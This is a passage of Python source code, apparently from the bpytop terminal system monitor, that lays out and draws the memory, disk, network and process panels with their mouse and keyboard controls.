cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.stat_mode:
width_p, height_p = 100, cls.height_p
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
return out
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
elif CONFIG.swap_disk and CONFIG.show_disks:
Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free")
break
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
Draw.buffer("mem_misc", out_misc, only_save=True)
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = True if cls.mem_width > 21 else False
for name in cls.mem_names:
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = True if cls.disks_width >= 25 else False
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int
if cls.stat_mode:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=False if direction == "download" else True, color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.proc_mode:
width_p, height_p = 100, 80
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if cls.stat_mode: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and mouse_pos[1] > cls.current_y + 1 and mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if cls.stat_mode: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details["killed"]
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = THEME.inactive_fg
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
